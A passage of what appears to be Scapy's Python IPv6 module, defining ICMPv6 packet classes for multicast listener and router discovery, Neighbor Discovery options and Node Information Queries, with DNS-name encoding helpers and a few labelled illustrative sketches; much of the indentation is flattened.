type = 129
def answers(self, other):
# We could match data content between request and reply.
return (isinstance(other, ICMPv6EchoRequest) and
self.id == other.id and self.seq == other.seq and
self.data == other.data)
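# --- Illustrative sketch (not part of the original module) ---
# hashret()/answers() above are what let Scapy pair an Echo Reply with its
# Echo Request (matching id, seq and data). Addresses are documentation values.
def _example_icmpv6_echo_matching():
    req = IPv6(src="2001:db8::100", dst="2001:db8::1")/ICMPv6EchoRequest(id=0x1234, seq=1, data="ping")
    rep = IPv6(src="2001:db8::1", dst="2001:db8::100")/ICMPv6EchoReply(id=0x1234, seq=1, data="ping")
    return rep.answers(req)   # true for matching id/seq/data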
############ ICMPv6 Multicast Listener Discovery (RFC3810) ##################
# All MLD messages are sent with a link-local source address
# -> this should be enforced in post_build if none is specified
# The Hop-Limit value must be 1
# "and an IPv6 Router Alert option in a Hop-by-Hop Options
# header. (The router alert option is necessary to cause routers to
# examine MLD messages sent to multicast addresses in which the router
# itself has no interest"
class _ICMPv6ML(_ICMPv6):
fields_desc = [ ByteEnumField("type", 130, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
ShortField("mrd", 0),
ShortField("reserved", 0),
IP6Field("mladdr","::")]
# general queries are sent to the link-scope all-nodes multicast
# address ff02::1, with a multicast address field of 0 and a MRD of
# [Query Response Interval]
# Default value for mladdr is set to 0 for a General Query, and
# overloaded by the user for a Multicast Address specific query
# TODO : See what we can do to automatically include a Router Alert
# Option in a Hop-by-Hop Options Header.
class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Query"
type = 130
mrd = 10000 # 10s for mrd
mladdr = "::"
overload_fields = {IPv6: { "dst": "ff02::1", "hlim": 1, "nh": 58 }}
def hashret(self):
if self.mladdr != "::":
return (
inet_pton(socket.AF_INET6, self.mladdr) + self.payload.hashret()
)
else:
return self.payload.hashret()
# TODO : See what we can do to automatically include a Router Alert
# Option in a Hop-by-Hop Options Header.
class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Report"
type = 131
overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
# TODO : implement hashret() and answers()
# When a node ceases to listen to a multicast address on an interface,
# it SHOULD send a single Done message to the link-scope all-routers
# multicast address (FF02::2), carrying in its multicast address field
# the address to which it is ceasing to listen
# TODO : See what we can do to automatically include a Router Alert
# Option in a Hop-by-Hop Options Header.
class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Done"
type = 132
overload_fields = {IPv6: { "dst": "ff02::2", "hlim": 1, "nh": 58}}
########## ICMPv6 MRD - Multicast Router Discovery (RFC 4286) ###############
# TODO:
# - 04/09/06 troglocan : find a way to automatically add a router alert
# option for all MRD packets. This could be done in a specific
# way when IPv6 is the under layer with some specific keyword
# like 'exthdr'. This would allow keeping compatibility with
# providing IPv6 fields to be overloaded in fields_desc.
#
# At the moment, if user inserts an IPv6 Router alert option
# none of the IPv6 default values of IPv6 layer will be set.
class ICMPv6MRD_Advertisement(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Advertisement"
fields_desc = [ByteEnumField("type", 151, icmp6types),
ByteField("advinter", 20),
XShortField("cksum", None),
ShortField("queryint", 0),
ShortField("robustness", 0)]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:8], s[8:]
class ICMPv6MRD_Solicitation(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Solicitation"
fields_desc = [ByteEnumField("type", 152, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
class ICMPv6MRD_Termination(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Termination"
fields_desc = [ByteEnumField("type", 153, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::6A"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
################### ICMPv6 Neighbor Discovery (RFC 2461) ####################
icmp6ndopts = { 1: "Source Link-Layer Address",
2: "Target Link-Layer Address",
3: "Prefix Information",
4: "Redirected Header",
5: "MTU",
6: "NBMA Shortcut Limit Option", # RFC2491
7: "Advertisement Interval Option",
8: "Home Agent Information Option",
9: "Source Address List",
10: "Target Address List",
11: "CGA Option", # RFC 3971
12: "RSA Signature Option", # RFC 3971
13: "Timestamp Option", # RFC 3971
14: "Nonce option", # RFC 3971
15: "Trust Anchor Option", # RFC 3971
16: "Certificate Option", # RFC 3971
17: "IP Address Option", # RFC 4068
18: "New Router Prefix Information Option", # RFC 4068
19: "Link-layer Address Option", # RFC 4068
20: "Neighbor Advertisement Acknowledgement Option",
21: "CARD Request Option", # RFC 4065/4066/4067
22: "CARD Reply Option", # RFC 4065/4066/4067
23: "MAP Option", # RFC 4140
24: "Route Information Option", # RFC 4191
25: "Recusive DNS Server Option",
26: "IPv6 Router Advertisement Flags Option"
}
icmp6ndoptscls = { 1: "ICMPv6NDOptSrcLLAddr",
2: "ICMPv6NDOptDstLLAddr",
3: "ICMPv6NDOptPrefixInfo",
4: "ICMPv6NDOptRedirectedHdr",
5: "ICMPv6NDOptMTU",
6: "ICMPv6NDOptShortcutLimit",
7: "ICMPv6NDOptAdvInterval",
8: "ICMPv6NDOptHAInfo",
9: "ICMPv6NDOptSrcAddrList",
10: "ICMPv6NDOptTgtAddrList",
#11: Do Me,
#12: Do Me,
#13: Do Me,
#14: Do Me,
#15: Do Me,
#16: Do Me,
17: "ICMPv6NDOptIPAddr",
18: "ICMPv6NDOptNewRtrPrefix",
19: "ICMPv6NDOptLLA",
#18: Do Me,
#19: Do Me,
#20: Do Me,
#21: Do Me,
#22: Do Me,
23: "ICMPv6NDOptMAP",
24: "ICMPv6NDOptRouteInfo",
25: "ICMPv6NDOptRDNSS",
26: "ICMPv6NDOptEFA",
31: "ICMPv6NDOptDNSSL"
}
class _ICMPv6NDGuessPayload:
name = "Dummy ND class that implements guess_payload_class()"
def guess_payload_class(self,p):
if len(p) > 1:
return get_cls(icmp6ndoptscls.get(ord(p[0]),"Raw"), "Raw") # s/Raw/ICMPv6NDOptUnknown/g ?
# Beginning of ICMPv6 Neighbor Discovery Options.
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
fields_desc = [ ByteField("type",None),
FieldLenField("len",None,length_of="data",fmt="B",
adjust = lambda pkt,x: x+2),
StrLenField("data","",
length_from = lambda pkt: pkt.len-2) ]
# NOTE: len includes the type and len fields. Expressed in units of 8 bytes.
# TODO: revisit the use of ETHER_ANY
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
fields_desc = [ ByteField("type", 1),
ByteField("len", 1),
MACField("lladdr", ETHER_ANY) ]
def mysummary(self):
return self.sprintf("%name% %lladdr%")
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
type = 2
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
fields_desc = [ ByteField("type",3),
ByteField("len",4),
ByteField("prefixlen",None),
BitField("L",1,1),
BitField("A",1,1),
BitField("R",0,1),
BitField("res1",0,5),
XIntField("validlifetime",0xffffffffL),
XIntField("preferredlifetime",0xffffffffL),
XIntField("res2",0x00000000),
IP6Field("prefix","::") ]
def mysummary(self):
return self.sprintf("%name% %prefix%")
# TODO: We should also limit the size of included packet to something
# like (initiallen - 40 - 2)
class TruncPktLenField(PacketLenField):
__slots__ = ["cur_shift"]
def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):
PacketLenField.__init__(self, name, default, cls, length_from=length_from)
self.cur_shift = cur_shift
def getfield(self, pkt, s):
l = self.length_from(pkt)
i = self.m2i(pkt, s[:l])
return s[l:],i
def m2i(self, pkt, m):
s = None
try: # It can happen we have sth shorter than 40 bytes
s = self.cls(m)
except:
return conf.raw_layer(m)
return s
def i2m(self, pkt, x):
s = str(x)
l = len(s)
r = (l + self.cur_shift) % 8
l = l - r
return s[:l]
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
# TODO: add a post_build to recompute the length (as a multiple of 8 octets)
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
fields_desc = [ ByteField("type",4),
FieldLenField("len", None, length_of="pkt", fmt="B",
adjust = lambda pkt,x:(x+8)/8),
StrFixedLenField("res", "\x00"*6, 6),
TruncPktLenField("pkt", "", IPv6, 8,
length_from = lambda pkt: 8*pkt.len-8) ]
# See which value should be used for default MTU instead of 1280
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - MTU"
fields_desc = [ ByteField("type",5),
ByteField("len",1),
XShortField("res",0),
IntField("mtu",1280)]
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
fields_desc = [ ByteField("type", 6),
ByteField("len", 1),
ByteField("shortcutlim", 40), # XXX
ByteField("res1", 0),
IntField("res2", 0) ]
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
fields_desc = [ ByteField("type",7),
ByteField("len",1),
ShortField("res", 0),
IntField("advint", 0) ]
def mysummary(self):
return self.sprintf("%name% %advint% milliseconds")
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Home Agent Information"
fields_desc = [ ByteField("type",8),
ByteField("len",1),
ShortField("res", 0),
ShortField("pref", 0),
ShortField("lifetime", 1)]
def mysummary(self):
return self.sprintf("%name% %pref% %lifetime% seconds")
# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
fields_desc = [ ByteField("type",17),
ByteField("len", 3),
ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
2: "New Care-Of Address",
3: "NAR's IP address" }),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("addr", "::") ]
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"
fields_desc = [ ByteField("type",18),
ByteField("len", 3),
ByteField("optcode", 0),
ByteField("plen", 64),
IntField("res", 0),
IP6Field("prefix", "::") ]
_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1: "LLA for the new AP",
2: "LLA of the MN",
3: "LLA of the NAR",
4: "LLA of the src of TrSolPr or PrRtAdv msg",
5: "AP identified by LLA belongs to current iface of router",
6: "No preifx info available for AP identified by the LLA",
7: "No fast handovers support for AP identified by the LLA" }
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"
fields_desc = [ ByteField("type", 19),
ByteField("len", 1),
ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
MACField("lla", ETHER_ANY) ] # We only support ethernet
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet): # RFC 4140
name = "ICMPv6 Neighbor Discovery - MAP Option"
fields_desc = [ ByteField("type", 23),
ByteField("len", 3),
BitField("dist", 1, 4),
BitField("pref", 15, 4), # highest availability
BitField("R", 1, 1),
BitField("res", 0, 7),
IntField("validlifetime", 0xffffffff),
IP6Field("addr", "::") ]
class _IP6PrefixField(IP6Field):
__slots__ = ["length_from"]
def __init__(self, name, default):
IP6Field.__init__(self, name, default)
self.length_from = lambda pkt: 8*(pkt.len - 1)
def addfield(self, pkt, s, val):
return s + self.i2m(pkt, val)
def getfield(self, pkt, s):
l = self.length_from(pkt)
p = s[:l]
if l < 16:
p += '\x00'*(16-l)
return s[l:], self.m2i(pkt,p)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def i2m(self, pkt, x):
l = pkt.len
if x is None:
x = "::"
if l is None:
l = 1
x = inet_pton(socket.AF_INET6, x)
if l is None:
return x
if l in [0, 1]:
return ""
if l in [2, 3]:
return x[:8*(l-1)]
return x + '\x00'*8*(l-3)
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet): # RFC 4191
name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
fields_desc = [ ByteField("type",24),
FieldLenField("len", None, length_of="prefix", fmt="B",
adjust = lambda pkt,x: x/8 + 1),
ByteField("plen", None),
BitField("res1",0,3),
BitField("prf",0,2),
BitField("res2",0,3),
IntField("rtlifetime", 0xffffffff),
_IP6PrefixField("prefix", None) ]
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006
name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
fields_desc = [ ByteField("type", 25),
FieldLenField("len", None, count_of="dns", fmt="B",
adjust = lambda pkt,x: 2*x+1),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
IP6ListField("dns", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075)
name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
fields_desc = [ ByteField("type", 26),
ByteField("len", 1),
BitField("res", 0, 48) ]
# As required in Section 8 of RFC 3315, Domain Names must be encoded as
# described in Section 3.1 of RFC 1035.
# XXX A label should be at most 63 octets in length: we do not enforce it.
# The total length of a domain should be at most 255 octets: we do not enforce it either.
class DomainNameListField(StrLenField):
__slots__ = ["padded"]
islist = 1
padded_unit = 8
def __init__(self, name, default, fld=None, length_from=None, padded=False):
self.padded = padded
StrLenField.__init__(self, name, default, fld, length_from)
def i2len(self, pkt, x):
return len(self.i2m(pkt, x))
def m2i(self, pkt, x):
res = []
while x:
# Get a name until \x00 is reached
cur = []
while x and x[0] != '\x00':
l = ord(x[0])
cur.append(x[1:l+1])
x = x[l+1:]
if self.padded:
# Discard following \x00 in padded mode
if len(cur):
res.append(".".join(cur) + ".")
else:
# Store the current name
res.append(".".join(cur) + ".")
if x and x[0] == '\x00':
x = x[1:]
return res
def i2m(self, pkt, x):
def conditionalTrailingDot(z):
if z and z[-1] == '\x00':
return z
return z+'\x00'
# Build the encoded names
tmp = map(lambda y: map((lambda z: chr(len(z))+z), y.split('.')), x)
ret_string = "".join(map(lambda x: conditionalTrailingDot("".join(x)), tmp))
# In padded mode, add some \x00 bytes
if self.padded and not len(ret_string) % self.padded_unit == 0:
ret_string += "\x00" * (self.padded_unit - len(ret_string) % self.padded_unit)
return ret_string
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106
name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
fields_desc = [ ByteField("type", 31),
FieldLenField("len", None, length_of="searchlist", fmt="B",
adjust=lambda pkt, x: 1+ x/8),
ShortField("res", None),
IntField("lifetime", 0xffffffff),
DomainNameListField("searchlist", [],
length_from=lambda pkt: 8*pkt.len -8,
padded=True)
]
# End of ICMPv6 Neighbor Discovery Options.
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Solicitation"
fields_desc = [ ByteEnumField("type", 133, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::2", "hlim": 255 }}
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Neighbor Discovery - Router Advertisement"
fields_desc = [ ByteEnumField("type", 134, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
ByteField("chlim",0),
BitField("M",0,1),
BitField("O",0,1),
BitField("H",0,1),
BitEnumField("prf",1,2, { 0: "Medium (default)",
1: "High",
2: "Reserved",
3: "Low" } ), # RFC 4191
BitField("P",0,1),
BitField("res",0,2),
ShortField("routerlifetime",1800),
IntField("reachabletime",0),
IntField("retranstimer",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def answers(self, other):
return isinstance(other, ICMPv6ND_RS)
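# --- Illustrative sketch (not part of the original module) ---
# A Router Advertisement carrying some of the ND options defined above
# (prefix information, RDNSS, and a padded DNS search list). Addresses,
# names and lifetimes are documentation values, not module defaults.
def _example_router_advertisement():
    ra = (IPv6(src="fe80::1", dst="ff02::1")
          /ICMPv6ND_RA(routerlifetime=1800)
          /ICMPv6NDOptPrefixInfo(prefix="2001:db8::", prefixlen=64)
          /ICMPv6NDOptRDNSS(dns=["2001:db8::53"], lifetime=600)
          /ICMPv6NDOptDNSSL(searchlist=["example.com."], lifetime=600))
    return str(ra)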
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
fields_desc = [ ByteEnumField("type",135, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("res", 0),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return self.tgt+self.payload.hashret()
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
fields_desc = [ ByteEnumField("type",136, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
BitField("R",1,1),
BitField("S",0,1),
BitField("O",1,1),
XBitField("res",0,29),
IP6Field("tgt","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
def mysummary(self):
return self.sprintf("%name% (tgt: %tgt%)")
def hashret(self):
return self.tgt+self.payload.hashret()
def answers(self, other):
return isinstance(other, ICMPv6ND_NS) and self.tgt == other.tgt
# associated possible options : target link-layer option, Redirected header
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
name = "ICMPv6 Neighbor Discovery - Redirect"
fields_desc = [ ByteEnumField("type",137, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
XIntField("res",0),
IP6Field("tgt","::"),
IP6Field("dst","::") ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
################ ICMPv6 Inverse Neighbor Discovery (RFC 3122) ###############
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
fields_desc = [ ByteField("type",9),
FieldLenField("len", None, count_of="addrlist", fmt="B",
adjust = lambda pkt,x: 2*x+1),
StrFixedLenField("res", "\x00"*6, 6),
IP6ListField("addrlist", [],
length_from = lambda pkt: 8*(pkt.len-1)) ]
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
type = 10
# RFC3122
# Required options : source lladdr and target lladdr
# Other valid options : source address list, MTU
# - As stated in the document, it would be nice to take the L2 address
# requested in the mandatory target lladdr option and use it as the
# Ethernet destination address if no address is specified.
# - That does not seem very practical if the user has to specify all
# the options.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
fields_desc = [ ByteEnumField("type",141, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
# Required options : target lladdr, target address list
# Other valid options : MTU
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
fields_desc = [ ByteEnumField("type",142, icmp6types),
ByteField("code",0),
XShortField("cksum",None),
XIntField("reserved",0) ]
overload_fields = {IPv6: { "nh": 58, "dst": "ff02::1", "hlim": 255 }}
###############################################################################
# ICMPv6 Node Information Queries (RFC 4620)
###############################################################################
# [ ] Add automatic destination address computation using computeNIGroupAddr
# in IPv6 class (Scapy6 modification when integrated) if :
# - it is not provided
# - upper layer is ICMPv6NIQueryName() with a valid value
# [ ] Try to be liberal in what we accept as internal values for _explicit_
# DNS elements provided by users. Any string should be considered
# valid and kept as provided. At the moment, i2repr() will
# crash on many inputs.
# [ ] Do the documentation
# [ ] Add regression tests
# [ ] Perform test against real machines (NOOP reply is proof of implementation).
# [ ] Check if there are differences between different stacks. Among *BSD,
# with others.
# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompression in
# dnsrepr2names(). It should be possible to disable it.
icmp6_niqtypes = { 0: "NOOP",
2: "Node Name",
3: "IPv6 Address",
4: "IPv4 Address" }
class _ICMPv6NIHashret:
def hashret(self):
return self.nonce
class _ICMPv6NIAnswers:
def answers(self, other):
return self.nonce == other.nonce
# Buggy; always returns the same value during a session
class NonceField(StrFixedLenField):
def __init__(self, name, default=None):
StrFixedLenField.__init__(self, name, default, 8)
if default is None:
self.default = self.randval()
# Compute the NI group address. Can take an FQDN as input parameter
def computeNIGroupAddr(name):
import md5
name = name.lower().split(".")[0]
record = chr(len(name))+name
h = md5.new(record)
h = h.digest()
addr = "ff02::2:%2x%2x:%2x%2x" % struct.unpack("BBBB", h[:4])
return addr
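# --- Illustrative sketch (not part of the original module) ---
# computeNIGroupAddr() hashes the first (lowercased) label of the name and
# keeps 32 bits of the MD5 digest inside ff02::2:xxxx:xxxx. This relies on
# the legacy Python 2 'md5' module imported above.
def _example_ni_group_addr():
    return computeNIGroupAddr("host.example.com")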
# Here is the deal. First, that protocol is a mess. Then, we
# provide 4 classes for the different kinds of Requests (one for every
# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
# data field class that is made to be smart by guessing the specific
# type of value provided :
#
# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
# if not overridden by user
# - IPv4 if acceptable for inet_pton(AF_INET, ): code is set to 2,
# if not overridden
# - Name in the other cases: code is set to 1, if not overridden by user
#
# Internal storage is not only the value, but a pair providing
# the type and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@)
#
# Note : I merged getfield() and m2i(). m2i() should not be called
# directly anyway. Same remark for addfield() and i2m()
#
# -- arno
# "The type of information present in the Data field of a query is
# declared by the ICMP Code, whereas the type of information in a
# Reply is determined by the Qtype"
def names2dnsrepr(x):
"""
Take as input a list of DNS names or a single DNS name
and encode it in DNS format (with possible compression)
If a string that is already a DNS name in DNS format
is passed, it is returned unmodified. Result is a string.
!!! At the moment, compression is not implemented !!!
"""
if type(x) is str:
if x and x[-1] == '\x00': # stupid heuristic
return x
x = [x]
res = []
for n in x:
termin = "\x00"
if n.count('.') == 0: # single-component gets one more
termin += '\x00'
n = "".join(map(lambda y: chr(len(y))+y, n.split("."))) + termin
res.append(n)
return "".join(res)
def dnsrepr2names(x):
"""
Takes as input a DNS-encoded string (possibly compressed)
and returns a list of the DNS names contained in it.
If the provided string is already in printable format
(it does not end with a null character), a one-element list
is returned. Result is a list.
"""
res = []
cur = ""
while x:
l = ord(x[0])
x = x[1:]
if l == 0:
if cur and cur[-1] == '.':
cur = cur[:-1]
res.append(cur)
cur = ""
if x and ord(x[0]) == 0: # single component
x = x[1:]
continue
if l & 0xc0: # XXX TODO : work on that -- arno
raise Exception("DNS message can't be compressed at this point!")
else:
cur += x[:l]+"."
x = x[l:]
return res
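# --- Illustrative sketch (not part of the original module) ---
# names2dnsrepr() and dnsrepr2names() are inverses of each other for simple,
# uncompressed names.
def _example_dns_name_roundtrip():
    wire = names2dnsrepr(["www.example.com", "example.net"])
    return dnsrepr2names(wire)   # ['www.example.com', 'example.net']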
class NIQueryDataField(StrField):
def __init__(self, name, default):
StrField.__init__(self, name, default)
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 1:
val = dnsrepr2names(val)[0]
return val
def h2i(self, pkt, x):
if type(x) is tuple and type(x[0]) is int:
return x
val = None
try: # Try IPv6
inet_pton(socket.AF_INET6, x)
val = (0, x)
except:
try: # Try IPv4
inet_pton(socket.AF_INET, x)
val = (2, x)
except: # Try DNS
if x is None:
x = ""
x = names2dnsrepr(x)
val = (1, x)
return val
def i2repr(self, pkt, x):
t,val = x
if t == 1: # DNS Name
# we don't use dnsrepr2names() to deal with
# possible weird data extracted info
res = []
weird = None
while val:
l = ord(val[0])
val = val[1:]
if l == 0:
if (len(res) > 1 and val): # fqdn with data behind
weird = val
elif len(val) > 1: # single label with data behind
weird = val[1:]
break
res.append(val[:l]+".")
val = val[l:]
tmp = "".join(res)
if tmp and tmp[-1] == '.':
tmp = tmp[:-1]
return tmp
return repr(val)
def getfield(self, pkt, s):
qtype = getattr(pkt, "qtype")
if qtype == 0: # NOOP
return s, (0, "")
else:
code = getattr(pkt, "code")
if code == 0: # IPv6 Addr
return s[16:], (0, inet_ntop(socket.AF_INET6, s[:16]))
elif code == 2: # IPv4 Addr
return s[4:], (2, inet_ntop(socket.AF_INET, s[:4]))
else: # Name or Unknown
return "", (1, s)
def addfield(self, pkt, s, val):
if ((type(val) is tuple and val[1] is None) or
val is None):
val = (1, "")
t = val[0]
if t == 1:
return s + val[1]
elif t == 0:
return s + inet_pton(socket.AF_INET6, val[1])
else:
return s + inet_pton(socket.AF_INET, val[1])
class NIQueryCodeField(ByteEnumField):
def i2m(self, pkt, x):
if x is None:
d = pkt.getfieldval("data")
if d is None:
return 1
elif d[0] == 0: # IPv6 address
return 0
elif d[0] == 1: # Name
return 1
elif d[0] == 2: # IPv4 address
return 2
else:
return 1
return x
_niquery_code = {0: "IPv6 Query", 1: "Name Query", 2: "IPv4 Query"}
#_niquery_flags = { 2: "All unicast addresses", 4: "IPv4 addresses",
# 8: "Link-local addresses", 16: "Site-local addresses",
# 32: "Global addresses" }
# "This NI type has no defined flags and never has a Data Field". Used
# to know if the destination is up and implements NI protocol.
class ICMPv6NIQueryNOOP(_ICMPv6NIHashret, _ICMPv6):
name = "ICMPv6 Node Information Query - NOOP Query"
fields_desc = [ ByteEnumField("type", 139, icmp6types),
NIQueryCodeField("code", None, _niquery_code),
XShortField("cksum", None),
ShortEnumField("qtype", 0, icmp6_niqtypes),
BitField("unused", 0, 10),
FlagsField("flags", 0, 6, "TACLSG"),
NonceField("nonce", None),
NIQueryDataField("data", None) ]
class ICMPv6NIQueryName(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Name Query"
qtype = 2
# We ask for the IPv6 address of the peer
class ICMPv6NIQueryIPv6(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv6 Address Query"
qtype = 3
flags = 0x3E
class ICMPv6NIQueryIPv4(ICMPv6NIQueryNOOP):
name = "ICMPv6 Node Information Query - IPv4 Address Query"
qtype = 4
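# --- Illustrative sketch (not part of the original module) ---
# The data field guesses the ICMP code from the value it is given, as
# described in the comment block above: an IPv6 address gives code 0, a DNS
# name gives code 1, an IPv4 address gives code 2.
def _example_ni_queries():
    by_name = IPv6(dst="2001:db8::1")/ICMPv6NIQueryIPv6(data="host.example.com")
    by_addr = IPv6(dst="2001:db8::1")/ICMPv6NIQueryIPv6(data="2001:db8::1")
    return by_name, by_addr   # code will build as 1 (Name) and 0 (IPv6) respectively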
_nireply_code = { 0: "Successful Reply",
1: "Response Refusal",
3: "Unknown query type" }
_nireply_flags = { 1: "Reply set incomplete",
2: "All unicast addresses",
4: "IPv4 addresses",
8: "Link-local addresses",
16: "Site-local addresses",
32: "Global addresses" }
# Internal repr is one of those :
# (0, "some string") : unknown qtype values are mapped to that one
# (3, [ (ttl, ip6), ... ])
# (4, [ (ttl, ip4), ... ])
# (2, [ttl, dns_names]) : dns_names is one string that contains
# all the DNS names. Internally it is kept ready to be sent
# (undissected). i2repr() decodes it for the user. This is to
# make build after dissection bijective.
#
# I also merged getfield() and m2i(), and addfield() and i2m().
class NIReplyDataField(StrField):
def i2h(self, pkt, x):
if x is None:
return x
t,val = x
if t == 2:
ttl, dnsnames = val
val = [ttl] + dnsrepr2names(dnsnames)
return val
def h2i(self, pkt, x):
qtype = 0 # We will decode it as string if not
# overridden through 'qtype' in pkt
# No user hint, let's use 'qtype' value for that purpose
if type(x) is not tuple:
if pkt is not None:
qtype = getattr(pkt, "qtype")
else:
qtype = x[0]
x = x[1]
# From that point on, x is the value (second element of the tuple)
if qtype == 2: # DNS name
if type(x) is str: # listify the string
x = [x]
if type(x) is list and x and type(x[0]) is not int: # ttl was omitted : use 0
x = [0] + x
ttl = x[0]
names = x[1:]
return (2, [ttl, names2dnsrepr(names)])
elif qtype in [3, 4]: # IPv4 or IPv6 addr
if type(x) is str:
x = [x] # User directly provided an IP, instead of list
# List elements are not tuples, user probably
# omitted ttl value : we will use 0 instead
def addttl(x):
if type(x) is str:
return (0, x)
return x
return (qtype, map(addttl, x))
return (qtype, x)
def addfield(self, pkt, s, val):
t,tmp = val
if tmp is None:
tmp = ""
if t == 2:
ttl,dnsstr = tmp
return s+ struct.pack("!I", ttl) + dnsstr
elif t == 3:
